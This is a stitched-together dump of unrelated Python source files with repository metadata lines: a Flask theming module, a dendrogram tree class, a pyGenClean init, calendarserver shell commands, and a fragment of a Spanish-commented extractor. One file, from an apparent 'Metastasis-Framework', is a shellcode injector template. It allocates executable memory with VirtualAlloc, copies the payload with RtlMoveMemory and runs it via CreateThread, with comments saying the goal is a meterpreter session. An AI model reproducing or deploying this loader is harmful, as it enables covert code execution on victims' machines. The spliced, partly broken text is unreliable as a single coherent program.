## Es probable que asi evitemos la incongruencia de tener una factoria que construye instancias que no estan definidas en momento de preproceso
self.Extractor = self.extractores[tipo](config)
except Exception, e:
self.logger.exception("Excepcion creando el tipo %s con clase %s " % (tipo,self.extractores[tipo]))
# traceback.print_exc()
raise e
oTmpMsg = MIMEText("Error en %s : %s " % (config.seccion(),str(e)),'plain','ISO-8859-15')
def run(self):
try:
self.logger.debug("%s : Calling extract ..." % (self.params.seccion()))
self.extract()
self.logger.debug("%s : Calling format ..." % (self.params.seccion()))
self.format()
self.logger.debug("%s : Execution (includes formatting) finished!" % (self.params.seccion()))
except Exception,e:
self.logger.exception("%s : problems Extracting and Formatting data." % (self.params.seccion()))
raise e
def extract(self):
self.Extractor.extract()
def format(self):
## Here we have to check configuration and select the appropiate class
try:
fmt = self.params.get(self.params.seccion(),'formatter')
Extract = self.Extractor
self.logger.debug("formato %s con extractor %s y parametros %s " % (fmt,self.Extractor,self.params))
self.Formatter = self.formateadores[fmt](self.Extractor,self.params)
except Exception,e:
self.logger.exception("%s : Problems loading formatter" % (self.params.seccion()))
#self.logger.exception("%s : Problems loading formatter %s " % (self.params.seccion(),fmt))
raise e
def getMimeResult(self):
if not self.Formatter:
txt = "%s : no formatter available , can't get Mime " % (self.params.seccion())
self.logger.error(txt)
raise Exception("%s : no formatter available , can't get Mime " % (self.params.seccion()))
return self.Formatter.getMimeResult()
def close(self):
self.Formatter.close()
|
gpl-2.0
| -723,263,891,476,053,800 | 44.307829 | 171 | 0.535365 | false |
small-yellow-rice/qt
|
quokka_themes/__init__.py
|
1
|
18620
|
# -*- coding: utf-8 -*-
"""
Quokka-Themes
=============
This provides infrastructure for theming support in your Quokka applications.
It takes care of:
- Loading themes
- Rendering their templates
- Serving their static media
- Letting themes reference their templates and static media
:based in: 2013 Christopher Carter, 2012 Drew Lustro, 2010 Matthew "LeafStorm" Frazier
:license: MIT/X11, see LICENSE for details
"""
from __future__ import with_statement
from .version import __version__
## Yarg, here be pirates!
from operator import attrgetter
import itertools
import os
import os.path
import re
import logging
from flask import (Module, send_from_directory, render_template, json,
abort, url_for, Blueprint)
# Support >= Flask 0.9
try:
from flask import _app_ctx_stack as stack
except ImportError:
from flask import _request_ctx_stack as stack
from jinja2 import contextfunction
from jinja2.loaders import FileSystemLoader, BaseLoader, TemplateNotFound
from werkzeug import cached_property
logger = logging.getLogger()
DOCTYPES = 'html4 html5 xhtml'.split()
IDENTIFIER = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$')
containable = lambda i: i if hasattr(i, '__contains__') else tuple(i)
def starchain(i):
return itertools.chain(*i)
def active_theme(ctx):
if '_theme' in ctx:
return ctx['_theme']
elif ctx.name.startswith('_themes/'):
return ctx.name[8:].split('/', 1)[0]
else:
raise RuntimeError("Could not find the active theme")
@contextfunction
def global_theme_template(ctx, templatename, fallback=True):
theme = active_theme(ctx)
templatepath = '_themes/%s/%s' % (theme, templatename)
if (not fallback) or template_exists(templatepath):
return templatepath
else:
return templatename
@contextfunction
def global_theme_static(ctx, filename, external=False):
theme = active_theme(ctx)
return static_file_url(theme, filename, external)
@contextfunction
def global_theme_get_info(ctx, attribute_name, fallback=''):
theme = get_theme(active_theme(ctx))
try:
info = getattr(theme, attribute_name)
if info is None:
raise AttributeError("Got None for getattr(theme, '{0}')".format(attribute_name))
return info
except AttributeError:
pass
return theme.options.get(attribute_name, fallback)
def static_file_url(theme, filename, external=False):
"""
This is a shortcut for getting the URL of a static file in a theme.
:param theme: A `Theme` instance or identifier.
:param filename: The name of the file.
:param external: Whether the link should be external or not. Defaults to
`False`.
"""
if isinstance(theme, Theme):
theme = theme.identifier
return url_for('_themes.static', themeid=theme, filename=filename,
_external=external)
def render_theme_template(theme, template_name, _fallback=True, **context):
"""
This renders a template from the given theme. For example::
return render_theme_template(g.user.theme, 'index.html', posts=posts)
If `_fallback` is True and the template does not exist within the theme,
it will fall back on trying to render the template using the application's
normal templates. (The "active theme" will still be set, though, so you
can try to extend or include other templates from the theme.)
:param theme: Either the identifier of the theme to use, or an actual
`Theme` instance.
:param template_name: The name of the template to render.
:param _fallback: Whether to fall back to the default
"""
if not isinstance(theme, (list, tuple)):
theme = [theme]
logger.debug("Rendering template")
logger.debug("theme {} - template {} - fallback {} - context {}".format(
theme, template_name, _fallback, context))
if not isinstance(template_name, (list, tuple)):
template_name = [template_name]
last = template_name.pop()
themes = theme
for name in template_name:
for theme in themes:
if isinstance(theme, Theme):
theme = theme.identifier
context['_theme'] = theme
try:
logger.debug(
"trying to render {} in {}".format(name, theme)
)
return render_template('_themes/%s/%s' % (theme, name),
**context)
except TemplateNotFound:
logger.debug("{} not found in {}, trying next...".format(name, theme))
continue
if _fallback:
logger.debug("Fallback to app templates folder")
for name in template_name:
try:
logger.debug(
"trying to render {} in app templates".format(name))
return render_template(name, **context)
except TemplateNotFound:
logger.debug("{} not found, trying next...".format(name))
continue
for theme in themes:
if isinstance(theme, Theme):
theme = theme.identifier
context['_theme'] = theme
try:
logger.debug("Trying to load last template {} in {}".format(last, theme))
return render_template('_themes/%s/%s' % (theme, last), **context)
except TemplateNotFound:
continue
if _fallback:
logger.debug("Trying to load last template {} in app templates".format(last))
return render_template(last, **context)
logger.debug("Template {} not found".format(last))
raise
### convenience #########################################################
def get_theme(ident):
"""
This gets the theme with the given identifier from the current app's
theme manager.
:param ident: The theme identifier.
"""
ctx = stack.top
return ctx.app.theme_manager.themes[ident]
def get_themes_list():
"""
This returns a list of all the themes in the current app's theme manager,
sorted by identifier.
"""
ctx = stack.top
return list(ctx.app.theme_manager.list_themes())
def static(themeid, filename):
try:
ctx = stack.top
theme = ctx.app.theme_manager.themes[themeid]
except KeyError:
abort(404)
return send_from_directory(theme.static_path, filename)
def template_exists(templatename):
ctx = stack.top
return templatename in containable(ctx.app.jinja_env.list_templates())
### loaders #############################################################
def list_folders(path):
"""
This is a helper function that only returns the directories in a given
folder.
:param path: The path to list directories in.
"""
return (name for name in os.listdir(path)
if os.path.isdir(os.path.join(path, name)))
def load_themes_from(path):
"""
This is used by the default loaders. You give it a path, and it will find
valid themes and yield them one by one.
:param path: The path to search for themes in.
"""
for basename in (b for b in list_folders(path) if IDENTIFIER.match(b)):
try:
t = Theme(os.path.join(path, basename))
except:
pass
else:
if t.identifier == basename:
yield t
def packaged_themes_loader(app):
"""
This theme will find themes that are shipped with the application. It will
look in the application's root path for a ``themes`` directory - for
example, the ``someapp`` package can ship themes in the directory
``someapp/themes/``.
"""
themes_path = os.path.join(app.root_path, 'themes')
if os.path.exists(themes_path):
return load_themes_from(themes_path)
else:
return ()
def theme_paths_loader(app):
"""
This checks the app's `THEME_PATHS` configuration variable to find
directories that contain themes. The theme's identifier must match the
name of its directory.
"""
theme_paths = app.config.get('THEME_PATHS', ())
if isinstance(theme_paths, basestring):
theme_paths = [p.strip() for p in theme_paths.split(';')]
return starchain(
load_themes_from(path) for path in theme_paths
)
class ThemeTemplateLoader(BaseLoader):
"""
This is a template loader that loads templates from the current app's
loaded themes.
"""
def __init__(self, as_blueprint=False):
self.as_blueprint = as_blueprint
BaseLoader.__init__(self)
def get_source(self, environment, template):
if self.as_blueprint and template.startswith("_themes/"):
template = template[8:]
try:
themename, templatename = template.split('/', 1)
ctx = stack.top
theme = ctx.app.theme_manager.themes[themename]
except (ValueError, KeyError):
raise TemplateNotFound(template)
try:
return theme.jinja_loader.get_source(environment, templatename)
except TemplateNotFound:
raise TemplateNotFound(template)
def list_templates(self):
res = []
ctx = stack.top
fmt = '_themes/%s/%s'
for ident, theme in ctx.app.theme_manager.themes.iteritems():
res.extend((fmt % (ident, t)).encode("utf8")
for t in theme.jinja_loader.list_templates())
return res
#########################################################################
themes_blueprint = Blueprint('_themes', __name__, url_prefix='/_themes')
themes_blueprint.jinja_loader = ThemeTemplateLoader(True)
themes_blueprint.add_url_rule('/<themeid>/<path:filename>', 'static', view_func=static)
class Themes:
""" This is the main class you will use to interact
with Flask-Themes2 on your app.
It really only implements the bare minimum, the rest
is passed through to other methods and classes.
"""
def __init__(self, app=None, **kwargs):
""" If given an app, this will simply call
init_themes, and pass through all kwargs
to init_themes, making it super easy.
:param app: the `~flask.Flask` instance to setup themes for.
:param \*\*kwargs: keyword args to pass through to init_themes
"""
if app is not None:
self._app = app
self.init_themes(self._app, **kwargs)
else:
self._app = None
def init_themes(self, app, loaders=None, app_identifier=None,
manager_cls=None, theme_url_prefix="/_themes"):
""" This sets up the theme infrastructure by adding a `ThemeManager` to the
given app and registering the module/blueprint containing the views and
templates needed.
:param app: The `~flask.Flask` instance to set up themes for.
:param loaders: An iterable of loaders to use. It defaults to `packaged_themes_loader` and `theme_paths_loader`.
:param app_identifier: The application identifier to use. If not given, it defaults to the app's import name.
:param manager_cls: If you need a custom manager class, you can pass it in here.
:param theme_url_prefix: The prefix to use for the URLs on the themes module. (Defaults to ``/_themes``.)
"""
if app_identifier is None:
app_identifier = app.import_name
if manager_cls is None:
manager_cls = ThemeManager
manager_cls(app, app_identifier, loaders=loaders)
app.jinja_env.globals['theme'] = global_theme_template
app.jinja_env.globals['theme_static'] = global_theme_static
app.jinja_env.globals['theme_get_info'] = global_theme_get_info
app.register_blueprint(themes_blueprint, url_prefix=theme_url_prefix)
class ThemeManager(object):
"""
This is responsible for loading and storing all the themes for an
application. Calling `refresh` will cause it to invoke all of the theme
loaders.
A theme loader is simply a callable that takes an app and returns an
iterable of `Theme` instances. You can implement your own loaders if your
app has another way to load themes.
:param app: The app to bind to. (Each instance is only usable for one
app.)
:param app_identifier: The value that the info.json's `application` key
is required to have. If you require a more complex
check, you can subclass and override the
`valid_app_id` method.
:param loaders: An iterable of loaders to use. The defaults are
`packaged_themes_loader` and `theme_paths_loader`, in that
order.
"""
def __init__(self, app, app_identifier, loaders=None):
self.bind_app(app)
self.app_identifier = app_identifier
self._themes = None
#: This is a list of the loaders that will be used to load the themes.
self.loaders = []
if loaders:
self.loaders.extend(loaders)
else:
self.loaders.extend((packaged_themes_loader, theme_paths_loader))
@property
def themes(self):
"""
This is a dictionary of all the themes that have been loaded. The keys
are the identifiers and the values are `Theme` objects.
"""
if self._themes is None:
self.refresh()
return self._themes
def list_themes(self):
"""
This yields all the `Theme` objects, in sorted order.
"""
return sorted(self.themes.itervalues(), key=attrgetter('identifier'))
def bind_app(self, app):
"""
If an app wasn't bound when the manager was created, this will bind
it. The app must be bound for the loaders to work.
:param app: A `~flask.Flask` instance.
"""
self.app = app
app.theme_manager = self
def valid_app_id(self, app_identifier):
"""
This checks whether the application identifier given will work with
this application. The default implementation checks whether the given
identifier matches the one given at initialization.
:param app_identifier: The application identifier to check.
"""
return self.app_identifier == app_identifier
def refresh(self):
"""
This loads all of the themes into the `themes` dictionary. The loaders
are invoked in the order they are given, so later themes will override
earlier ones. Any invalid themes found (for example, if the
application identifier is incorrect) will be skipped.
"""
self._themes = {}
for theme in starchain(ldr(self.app) for ldr in self.loaders):
if self.valid_app_id(theme.application):
self.themes[theme.identifier] = theme
class Theme(object):
"""
This contains a theme's metadata.
:param path: The path to the theme directory.
"""
def __init__(self, path):
#: The theme's root path. All the files in the theme are under this
#: path.
self.path = os.path.abspath(path)
with open(os.path.join(self.path, 'info.json')) as fd:
self.info = i = json.load(fd)
#: The theme's name, as given in info.json. This is the human
#: readable name.
self.name = i['name']
#: The application identifier given in the theme's info.json. Your
#: application will probably want to validate it.
self.application = i['application']
#: The theme's identifier. This is an actual Python identifier,
#: and in most situations should match the name of the directory the
#: theme is in.
self.identifier = i['identifier']
#: The human readable description. This is the default (English)
#: version.
self.description = i.get('description')
#: This is a dictionary of localized versions of the description.
#: The language codes are all lowercase, and the ``en`` key is
#: preloaded with the base description.
self.localized_desc = dict(
(k.split('_', 1)[1].lower(), v) for k, v in i.items()
if k.startswith('description_')
)
self.localized_desc.setdefault('en', self.description)
#: The author's name, as given in info.json. This may or may not
#: include their email, so it's best just to display it as-is.
self.author = i['author']
#: A short phrase describing the license, like "GPL", "BSD", "Public
#: Domain", or "Creative Commons BY-SA 3.0".
self.license = i.get('license')
#: A URL pointing to the license text online.
self.license_url = i.get('license_url')
#: The URL to the theme's or author's Web site.
self.website = i.get('website')
#: The theme's preview image, within the static folder.
self.preview = i.get('preview')
#: The theme's doctype. This can be ``html4``, ``html5``, or ``xhtml``
#: with html5 being the default if not specified.
self.doctype = i.get('doctype', 'html5')
#: The theme's version string.
self.version = i.get('version')
#: Any additional options. These are entirely application-specific,
#: and may determine other aspects of the application's behavior.
self.options = i.get('options', {})
@cached_property
def static_path(self):
"""
The absolute path to the theme's static files directory.
"""
return os.path.join(self.path, 'static')
@cached_property
def templates_path(self):
"""
The absolute path to the theme's templates directory.
"""
return os.path.join(self.path, 'templates')
@cached_property
def license_text(self):
"""
The contents of the theme's license.txt file, if it exists. This is
used to display the full license text if necessary. (It is `None` if
there was not a license.txt.)
"""
lt_path = os.path.join(self.path, 'license.txt')
if os.path.exists(lt_path):
with open(lt_path) as fd:
return fd.read()
else:
return None
@cached_property
def jinja_loader(self):
"""
This is a Jinja2 template loader that loads templates from the theme's
``templates`` directory.
"""
return FileSystemLoader(self.templates_path)
|
mit
| -4,202,205,206,850,931,700 | 33.609665 | 124 | 0.614017 | false |
Disguisenberg/Metastasis-Framework
|
template/template.py
|
1
|
2293
|
import ctypes
# ctypes makes it very simple to interact with the Windows API in a python script,so it will be a required import for this script. It provides C compatible data types and allows calling functions in DLLs or shared libraries
shellcode = (
);
# Shellcode - This is the shellcode that will be injected into memory and then execute it which will grant us a juide ssl certified meterpreter session
# We will be using 4 Win32 APIs, to execute the shellcode, these APIs are very important in dynamic memory management on Windows Platforms
ptr = ctypes.windll.kernel32.VirtualAlloc(0,4096,ctypes.c_int(0x1000),ctypes.c_int(0x40))
# First VirtualAlloc() function will allow us to create a new executable memory region and copy our shellcode to it and after that execute it
b = bytearray() # Store b as bytearray() so our shellcode in Python3 won't be used as bytes but bytecode
b.extend(map(ord, shellcode))
buf = (ctypes.c_char * len(shellcode)).from_buffer(b)
# Buffer pool constructs an array that consists the size of our shellcode
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# RtlMoveMemory() function accepts 3 arguments, a pointer to the destination (returned from VirtualAlloc()), a pointer to the memory to be copied and the number of bytes to be copied,in our case the size of the shellcode
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# CreateThread() accepts 6 arguments in our case the third argument is very important, we need to pass a pointer to the application -defined function to be executed by the thread returned by VirtualAlloc() if the function succeds,the return value is a handle to the new thread.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)))
# WaitForSingleObject() function accepts 2 arguments, the first one is the handle to the object (returned by CreateThread()) and the time-o
|
mit
| 2,696,099,267,623,453,000 | 90.72 | 277 | 0.685565 | false |
JudoWill/glue
|
glue/core/tree.py
|
1
|
9288
|
from __future__ import absolute_import, division, print_function
import numpy as np
__all__ = ['Tree', 'NewickTree', 'DendroMerge']
class Tree(object):
"""
Base class for hierarchical segmentations of data sets.
The tree is represented by its root node, which contains reference
to 0 or more children nodes.
Attributes
----------
id: Integer
An identifier for this node.
parent: Tree instance
A reference to this node's parent, if any
value:
A value associated with this node
children: List of Tre instances
The children of this node
index_map: Component instance
The tree id that each element to which each
element in the original data belongs.
"""
def __init__(self, id=None, value=None, index_map=None):
"""
Create a new Tree object.
Parameters
----------
id: Integer
Id of the tree
value:
Value of the tree
index_map: Component instance
index_map of the data
Raises
------
TypeError: if any of the inputs are the wrong type
"""
if (id is not None):
try:
id = int(id)
except ValueError:
raise TypeError("Input id must be in integer")
self.id = id
self.value = value
self.children = []
self.parent = None
self.index_map = index_map
self._index = None
def add_child(self, child):
"""
Add a new child node to this tree.
This is the preferred way for building trees, as it takes care
of input checking and linking between parent and child. Do not
append to the children attribute directly.
Parameters
----------
child: Tree instance
The child to add
Raises
------
TypeError: If the input is not a Tree instance
"""
if (not isinstance(child, Tree)):
raise TypeError("Child must be a tree instance")
self.children.append(child)
child.parent = self
def to_newick(self):
"""
Convert the tree to a newick string
Returns
-------
A newick string representation of the tree
"""
result = ''
if (self.children):
result = '(' + ','.join([c.to_newick()[0:-1]
for c in self.children]) + ')'
if (self.id is not None):
result += ('%s' % self.id)
if (self.value is not None):
result += (':%s' % self.value)
return result + ';'
@property
def index(self):
"""
A flattened index of all the nodes at and below this
branch
This property is a dictionary holding each node in the
tree, keyed by the node ids. Index will only work if the node
id's are unique.
The user of the index is responsible for making sure that the
tree hasn't changed since the index was created.
"""
if self._index is not None:
return self._index
self._index = {}
stack = [self]
while stack:
s = stack.pop()
if s.id in self._index:
raise KeyError("Cannot index this tree -- "
"node id's are non-unique")
self._index[s.id] = s
for c in s.children:
stack.append(c)
return self._index
def get_subtree_indices(self):
result = []
stack = [self]
while stack:
s = stack.pop()
result.append(s.id)
stack += s.children
return result
def get_leaves(self):
st = self.get_subtree_indices()
return [x for x in st if len(x.children) == 0]
def get_ancestors(self):
if self.parent is None:
return []
result = [self.parent]
while result[-1].parent is not None:
result.append(result[-1].parent)
return result
class NewickTree(Tree):
"""
A subclass of Tree, which generates trees from Newick Strings.
Attributes
----------
newick: The newick string
"""
def __init__(self, newick, index_map=None):
"""
Create a new tree from a newick string representation of a
tree
Attributes
----------
newick: String
The newick string
index_map: Component
The index map of the data
"""
self.newick = newick
self.__validateNewick()
(id, value) = self.__parse_id_value()
Tree.__init__(self, index_map=index_map,
id=id, value=value)
self.__parse_children()
def __validateNewick(self):
"""
Ensure that the suppied string represents a valid Newick
description.
Raises
------
ValueError: If the newick string is invalid
"""
pass
def __parse_id_value(self):
"""
Parse the root node id and value
Returns
-------
The root's id and value, as a list
"""
newick = self.newick
first = max([newick.rfind(')'),
newick.rfind(',')]) + 1
comma = newick.find(',', first)
if comma == -1:
comma = len(newick) - 1
paren = newick.find(')', first)
if paren == -1:
paren = len(newick) - 1
last = min([paren, comma])
mid = newick.find(':', first)
if (mid != -1):
id = newick[first:mid]
value = newick[mid + 1:last]
else:
id = newick[first:last]
value = None
return (id, value)
def __parse_children(self):
"""
Find and parse the children of the root.
This method recursively builds the tree, and populates the
root's children attribute.
Side Effects
------------
Any children currently stored in the root's children list are
erased.
"""
newick = self.newick
if newick[0] != '(':
return
depth = 0
start = 1
self.children = []
for i in range(1, len(newick)):
if (newick[i] == '('):
depth += 1
elif (newick[i] == ')' and depth != 0):
depth -= 1
elif ((newick[i] == ',' or newick[i] == ')')
and depth == 0):
child = NewickTree(newick[start:i] + ';',
index_map=self.index_map)
self.add_child(child)
start = i + 1
class DendroMerge(Tree):
"""
A dendrogram created from a merge array.
The merge array is a [nleaf - 1, 2] array where the ith row lists
the 2 nodes merge to form node nleaf + i. This data structure is
used in many older dendrogram creation tools (e.g., that of
Rosolowsky et al. 2008ApJ...679.1338R)
"""
def __init__(self, merge_list,
index_map=None, _id=-1):
"""
Create a new DendroMerge tree
Parameters
----------
merge_list: numpy array
a [nleaf - 1, 2] merge list (see class description above)
index_map: Component
See Tree documentation
"""
if(_id == -1):
self.validate_mergelist(merge_list)
nleaf = merge_list.shape[0] + 1
_id = 2 * nleaf - 2
else:
nleaf = merge_list.shape[0] + 1
Tree.__init__(self, id=_id,
index_map=index_map)
# base case: leaf
if (_id < nleaf):
return
# recursive case: branch. Create children
else:
c1 = min(merge_list[_id - nleaf, :])
c2 = max(merge_list[_id - nleaf, :])
c1 = DendroMerge(merge_list,
index_map=index_map,
_id=c1)
c2 = DendroMerge(merge_list,
index_map=index_map,
_id=c2)
self.add_child(c1)
self.add_child(c2)
def validate_mergelist(self, merge_list, msg=None):
"""
Ensure that merge_list is a vlid merge list
A valid merge_list is a [nleaf - 1, 2] numpy array,
that includes the numbers 0 through 2 * nleaf - 3
exactly once.
Parameters
----------
merge_list: ndarray instance
Raises
------
TypeError: If the merge_list is invalid
"""
if (not isinstance(merge_list, np.ndarray)):
raise TypeError("Invalid mergelist: not a numpy array")
if (merge_list.shape[1] != 2):
raise TypeError("Invalid mergelist: not a 2 column array")
f = merge_list.flatten()
if (len(f) != len(set(f))):
raise TypeError("Invalid mergelist: contains duplicates")
if ((min(f) != 0) or (max(f) != len(f) - 1)):
raise TypeError("Invalid mergelist: does not "
"run from 0-nleaf")
|
bsd-3-clause
| -7,541,047,189,419,370,000 | 26.560831 | 75 | 0.502369 | false |
lemieuxl/pyGenClean
|
pyGenClean/__init__.py
|
1
|
1723
|
# This file is part of pyGenClean.
#
# pyGenClean is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# pyGenClean is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# pyGenClean. If not, see <http://www.gnu.org/licenses/>.
import logging
try:
from .version import pygenclean_version as __version__
except:
__version__ = None
__author__ = "Louis-Philippe Lemieux Perreault"
__copyright__ = "Copyright 2014, Beaulieu-Saucier Pharmacogenomics Centre"
__credits__ = ["Louis-Philippe Lemieux Perreault", "Marc-Andre Legault"]
__license__ = "GPL"
__maintainer__ = "Louis-Philippe Lemieux Perreault"
__email__ = "louis-philippe.lemieux.perreault@statgen.org"
__status__ = "Development"
# Configuring logging
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s %(name)s %(levelname)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
def add_file_handler_to_root(log_fn):
"""Adds a file handler to the root logging.
:param log_fn: the name of the log file.
:type log_fn: str
"""
file_handler = logging.FileHandler(log_fn, mode="w")
file_handler.setFormatter(logging.Formatter(
fmt="[%(asctime)s %(name)s %(levelname)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
))
logging.root.addHandler(file_handler)
|
gpl-3.0
| -5,714,978,892,215,041,000 | 29.767857 | 79 | 0.69704 | false |
trevor/calendarserver
|
calendarserver/tools/shell/cmd.py
|
1
|
21936
|
##
# Copyright (c) 2011-2014 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Data store commands.
"""
__all__ = [
"UsageError",
"UnknownArguments",
"CommandsBase",
"Commands",
]
from getopt import getopt
from twext.python.log import Logger
from twisted.internet.defer import succeed
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.conch.manhole import ManholeInterpreter
from txdav.common.icommondatastore import NotFoundError
from calendarserver.version import version
from calendarserver.tools.tables import Table
from calendarserver.tools.purge import PurgePrincipalService
from calendarserver.tools.shell.vfs import Folder, RootFolder
from calendarserver.tools.shell.directory import findRecords, summarizeRecords, recordInfo
log = Logger()
class UsageError(Exception):
"""
Usage error.
"""
class UnknownArguments(UsageError):
"""
Unknown arguments.
"""
def __init__(self, arguments):
UsageError.__init__(self, "Unknown arguments: %s" % (arguments,))
self.arguments = arguments
class InsufficientArguments(UsageError):
"""
Insufficient arguments.
"""
def __init__(self):
UsageError.__init__(self, "Insufficient arguments.")
class CommandsBase(object):
"""
Base class for commands.
@ivar protocol: a protocol for parsing the incoming command line.
@type protocol: L{calendarserver.tools.shell.terminal.ShellProtocol}
"""
def __init__(self, protocol):
self.protocol = protocol
self.wd = RootFolder(protocol.service)
@property
def terminal(self):
return self.protocol.terminal
#
# Utilities
#
def documentationForCommand(self, command):
"""
@return: the documentation for the given C{command} as a
string.
"""
m = getattr(self, "cmd_%s" % (command,), None)
if m:
doc = m.__doc__.split("\n")
# Throw out first and last line if it's empty
if doc:
if not doc[0].strip():
doc.pop(0)
if not doc[-1].strip():
doc.pop()
if doc:
# Get length of indentation
i = len(doc[0]) - len(doc[0].lstrip())
result = []
for line in doc:
result.append(line[i:])
return "\n".join(result)
else:
self.terminal.write("(No documentation available for %s)\n" % (command,))
else:
raise NotFoundError("Unknown command: %s" % (command,))
def getTarget(self, tokens, wdFallback=False):
"""
Pop's the first token from tokens and locates the File
indicated by that token.
@return: a C{File}.
"""
if tokens:
return self.wd.locate(tokens.pop(0).split("/"))
else:
if wdFallback:
return succeed(self.wd)
else:
return succeed(None)
@inlineCallbacks
def getTargets(self, tokens, wdFallback=False):
"""
For each given C{token}, locate a File to operate on.
@return: iterable of C{File} objects.
"""
if tokens:
result = []
for token in tokens:
try:
target = (yield self.wd.locate(token.split("/")))
except NotFoundError:
raise UsageError("No such target: %s" % (token,))
result.append(target)
returnValue(result)
else:
if wdFallback:
returnValue((self.wd,))
else:
returnValue(())
def directoryRecordWithID(self, id):
"""
Obtains a directory record corresponding to the given C{id}.
C{id} is assumed to be a record UID. For convenience, may
also take the form C{type:name}, where C{type} is a record
type and C{name} is a record short name.
@return: an C{IDirectoryRecord}
"""
directory = self.protocol.service.directory
record = directory.recordWithUID(id)
if not record:
# Try type:name form
try:
recordType, shortName = id.split(":")
except ValueError:
pass
else:
record = directory.recordWithShortName(recordType, shortName)
return record
def commands(self, showHidden=False):
"""
@return: an iterable of C{(name, method)} tuples, where
C{name} is the name of the command and C{method} is the method
that implements it.
"""
for attr in dir(self):
if attr.startswith("cmd_"):
m = getattr(self, attr)
if showHidden or not hasattr(m, "hidden"):
yield (attr[4:], m)
@staticmethod
def complete(word, items):
"""
List completions for the given C{word} from the given
C{items}.
Completions are the remaining portions of words in C{items}
that start with C{word}.
For example, if C{"foobar"} and C{"foo"} are in C{items}, then
C{""} and C{"bar"} are completions when C{word} C{"foo"}.
@return: an iterable of completions.
"""
for item in items:
if item.startswith(word):
yield item[len(word):]
def complete_commands(self, word):
"""
@return: an iterable of command name completions.
"""
def complete(showHidden):
return self.complete(
word,
(name for name, method in self.commands(showHidden=showHidden))
)
completions = tuple(complete(False))
# If no completions are found, try hidden commands.
if not completions:
completions = complete(True)
return completions
@inlineCallbacks
def complete_files(self, tokens, filter=None):
"""
@return: an iterable of C{File} path completions.
"""
if filter is None:
filter = lambda item: True
if tokens:
token = tokens[-1]
i = token.rfind("/")
if i == -1:
# No "/" in token
base = self.wd
word = token
else:
base = (yield self.wd.locate(token[:i].split("/")))
word = token[i + 1:]
else:
base = self.wd
word = ""
files = (
entry.toString()
for entry in (yield base.list())
if filter(entry)
)
if len(tokens) == 0:
returnValue(files)
else:
returnValue(self.complete(word, files))
class Commands(CommandsBase):
"""
Data store commands.
"""
#
# Basic CLI tools
#
def cmd_exit(self, tokens):
"""
Exit the shell.
usage: exit
"""
if tokens:
raise UnknownArguments(tokens)
self.protocol.exit()
def cmd_help(self, tokens):
"""
Show help.
usage: help [command]
"""
if tokens:
command = tokens.pop(0)
else:
command = None
if tokens:
raise UnknownArguments(tokens)
if command:
self.terminal.write(self.documentationForCommand(command))
self.terminal.nextLine()
else:
self.terminal.write("Available commands:\n")
result = []
max_len = 0
for name, m in self.commands():
for line in m.__doc__.split("\n"):
line = line.strip()
if line:
doc = line
break
else:
doc = "(no info available)"
if len(name) > max_len:
max_len = len(name)
result.append((name, doc))
format = " %%%ds - %%s\n" % (max_len,)
for info in sorted(result):
self.terminal.write(format % (info))
def complete_help(self, tokens):
if len(tokens) == 0:
return (name for name, method in self.commands())
elif len(tokens) == 1:
return self.complete_commands(tokens[0])
else:
return ()
def cmd_emulate(self, tokens):
"""
Emulate editor behavior.
The only correct argument is: emacs
Other choices include: none
usage: emulate editor
"""
if not tokens:
if self.protocol.emulate:
self.terminal.write("Emulating %s.\n" % (self.protocol.emulate,))
else:
self.terminal.write("Emulation disabled.\n")
return
editor = tokens.pop(0).lower()
if tokens:
raise UnknownArguments(tokens)
if editor == "none":
self.terminal.write("Disabling emulation.\n")
editor = None
elif editor in self.protocol.emulation_modes:
self.terminal.write("Emulating %s.\n" % (editor,))
else:
raise UsageError("Unknown editor: %s" % (editor,))
self.protocol.emulate = editor
# FIXME: Need to update key registrations
cmd_emulate.hidden = "incomplete"
def complete_emulate(self, tokens):
if len(tokens) == 0:
return self.protocol.emulation_modes
elif len(tokens) == 1:
return self.complete(tokens[0], self.protocol.emulation_modes)
else:
return ()
def cmd_log(self, tokens):
"""
Enable logging.
usage: log [file]
"""
if hasattr(self, "_logFile"):
self.terminal.write("Already logging to file: %s\n" % (self._logFile,))
return
if tokens:
fileName = tokens.pop(0)
else:
fileName = "/tmp/shell.log"
if tokens:
raise UnknownArguments(tokens)
from twisted.python.log import startLogging
try:
f = open(fileName, "w")
except (IOError, OSError), e:
self.terminal.write("Unable to open file %s: %s\n" % (fileName, e))
return
startLogging(f)
self._logFile = fileName
cmd_log.hidden = "debug tool"
def cmd_version(self, tokens):
"""
Print version.
usage: version
"""
if tokens:
raise UnknownArguments(tokens)
self.terminal.write("%s\n" % (version,))
#
# Filesystem tools
#
def cmd_pwd(self, tokens):
"""
Print working folder.
usage: pwd
"""
if tokens:
raise UnknownArguments(tokens)
self.terminal.write("%s\n" % (self.wd,))
@inlineCallbacks
def cmd_cd(self, tokens):
"""
Change working folder.
usage: cd [folder]
"""
if tokens:
dirname = tokens.pop(0)
else:
return
if tokens:
raise UnknownArguments(tokens)
wd = (yield self.wd.locate(dirname.split("/")))
if not isinstance(wd, Folder):
raise NotFoundError("Not a folder: %s" % (wd,))
#log.info("wd -> %s" % (wd,))
self.wd = wd
